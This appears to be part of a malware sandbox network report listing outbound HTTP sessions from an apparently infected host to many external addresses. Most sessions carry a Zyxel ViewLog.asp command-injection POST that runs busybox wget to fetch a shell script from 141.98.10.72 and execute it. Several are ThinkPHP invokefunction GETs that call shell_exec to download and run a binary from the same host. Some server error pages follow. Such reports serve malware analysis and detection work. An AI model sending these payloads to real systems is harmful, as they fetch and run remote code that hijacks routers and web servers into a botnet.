                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:45.245085001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:28.247131109 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            99192.168.2.234080485.56.83.2248080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:02.200155020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            100192.168.2.233480694.121.142.1948080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:02.206782103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            101192.168.2.233755894.122.197.1598080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:02.208132029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            102192.168.2.234602488.149.106.3080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:03.590332031 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:03.829030037 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:03 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            103192.168.2.235413895.210.89.380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:04.031409025 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            104192.168.2.234256095.111.240.24980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:04.032282114 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:04.243535995 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            105192.168.2.234693295.100.190.6180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:04.045650005 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:04.268909931 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:28:04 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:04 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 62 64 31 66 35 35 37 26 23 34 36 3b 31 37 30 37 38 39 39 32 38 34 26 23 34 36 3b 35 39 34 36 36 65 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;dbd1f557&#46;1707899284&#46;59466eb</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            106192.168.2.235001294.123.0.828080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:04.728266954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            107192.168.2.233388231.136.225.88080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:04.932183027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:05.570636034 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:06.818393946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:09.410037994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:14.529328108 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:24.511976004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:45.245045900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:26.199350119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            108192.168.2.233469262.29.61.278080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:04.975575924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            109192.168.2.234329831.200.37.1568080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:04.977173090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            110192.168.2.234056695.131.73.1498080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:04.982919931 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:05.236227989 CET140INHTTP/1.1 403 Forbidden
                                                            Content-Type: text/html;charset=UTF-8
                                                            Content-Length: 0
                                                            Connection: close
                                                            Cache-control: no-cache


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            111192.168.2.235692885.113.219.1188080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:04.985878944 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:05.244380951 CET1254INHTTP/1.1 404
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Language: ru
                                                            Content-Length: 1117
                                                            Date: Wed, 14 Feb 2024 08:31:01 GMT
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 32 30 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
